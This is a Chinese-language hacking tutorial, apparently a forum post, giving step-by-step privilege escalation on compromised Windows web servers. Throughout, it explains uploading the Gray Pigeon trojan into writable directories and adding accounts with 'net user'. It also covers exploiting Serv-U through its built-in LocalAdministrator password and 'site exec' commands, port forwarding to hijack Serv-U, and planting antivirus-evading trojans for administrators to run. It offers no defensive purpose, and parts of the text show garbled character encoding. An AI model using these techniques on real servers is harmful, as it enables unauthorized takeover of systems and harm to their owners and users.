一：首先檢測(cè)一下網(wǎng)站的服務(wù)器是否開了 3389
遠(yuǎn)程終端
二：檢測(cè)一下服務(wù)是否用了serv-u （還有是什么版本的）
方法
一：復(fù)制一個(gè)網(wǎng)站 用 3389 登陸器連接一下 （是否成功）
能連接了，拿下服務(wù)器的機(jī)率，提高 30%了
二：用ftp模式查下一個(gè)服務(wù)器的版本
開始 -- 運(yùn)行 -- cmd -- ftp (加你要登陸的網(wǎng)站)
---------------------------------------------------------------------------------------
第一步：最簡(jiǎn)單的方法
看有沒(méi)有權(quán)限，能不能執(zhí)行命令，行的話直接傳個(gè)鴿子運(yùn)行（成功率非常低）
----------------------------------------------------------------------------------------
第二步：:尋找有執(zhí)行的權(quán)限目錄
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
這樣的目錄可以直接上傳鴿子，運(yùn)行
-----------------------------------------------------------------------------------
第三步：傳個(gè)cmd和開帳號(hào)的ftp.exe上去直接加帳號(hào)
命令就是你上傳目錄D:\VMware Workstation\cmd.exe "net user xiao xiao
/add"
-----------------------------------------------------------------------------------
第四步：asp提權(quán)木馬直接提權(quán)
serv-u 6.3 版本 好象用asp提權(quán)木馬（不成功）
serv-u 6.2 版本 好象可以
不過(guò)提權(quán)能不能用asp木馬還要看服務(wù)器，設(shè)置的變態(tài)不
假設(shè)直接用asp提權(quán)成功之后，還是不成功，但是可以在
cmd之下 用這個(gè)帳號(hào)連接一下
ftp (加你提權(quán)的網(wǎng)站)
帳號(hào)：LocalAdministrator 密碼：$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號(hào)了
命令：quote site exec (你添加的帳號(hào)) net user 123 123 /ad
quote site exec （把帳號(hào)提升到最高權(quán)限） net localgroup administartors
123 /add
---------------------------------------------------------------------------------------
第五步：pcaanywhere
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\
這里下他的GIF文件，在本地安裝pcanywhere上去
網(wǎng)上很多教程
---------------------------------------------------------------------------------------
第六步：serv-u覆蓋提權(quán)
本地安裝個(gè)su，將你自己的ServUDaemon.ini文件用從他那下載下來(lái)的ServUDaemon.ini
網(wǎng)上很多教程
----------------------------------------------------------------------------------------
第七步：Serv-U轉(zhuǎn)發(fā)端口
給Latte加鹽 曾經(jīng)做個(gè)一個(gè)（serv-u經(jīng)典提權(quán)全套教程）用到過(guò)這個(gè)方法，可以學(xué)習(xí)一下
上傳個(gè)端口轉(zhuǎn)發(fā)工具
命令：（工具名）–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個(gè)Serv-u，新建一個(gè)服務(wù)器，
IP填對(duì)方IP，帳號(hào)為L(zhǎng)ocalAdministrator
密碼為$ak#.1k;0@p">#1@$ak#.1k;0@p，
連接上后你就可以管理他的Serv-u了
--------------------------------------------------------------------------------------------
第八步：社會(huì)工程學(xué)之提升提權(quán)
把灰鴿子傳到上面，然后轉(zhuǎn)移到c盤，就等著管理員運(yùn)行了，前提你的鴿子必須免殺
要是讓我看到一個(gè)不清楚的exe程序，老想點(diǎn)開看看，呵呵(估計(jì)沒(méi)有那個(gè)SB會(huì)點(diǎn)吧)

最新評(píng)論